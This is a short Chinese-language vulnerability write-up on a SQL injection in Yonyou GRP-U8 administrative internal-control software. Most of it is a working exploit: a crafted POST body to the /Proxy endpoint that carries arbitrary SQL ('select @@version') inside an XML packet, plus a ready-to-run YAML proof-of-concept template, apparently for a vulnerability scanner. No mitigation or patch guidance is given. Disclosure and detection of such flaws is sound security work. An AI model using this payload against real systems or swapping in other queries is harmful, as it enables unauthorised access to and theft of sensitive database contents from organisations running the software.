0x01 漏洞描述

用友 GRP-U8 行政事业内控管理软件存在 SQL 注入漏洞，攻击者可通过精心构造的 payload 进行 SQL 注入攻击，从而获取数据库敏感信息。

0x02 漏洞影响

用友 GRP-U8 行政事业内控管理软件。

0x03 漏洞复现

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

0x04 POC检测

params: []
name: 用友GRP U8 Proxy_SQL注入漏洞
set: {}
rules:
- method: POST
  path: /Proxy
  headers: {}
  body: cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA
    format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA
    format="text">select @@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"COLUMN1")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""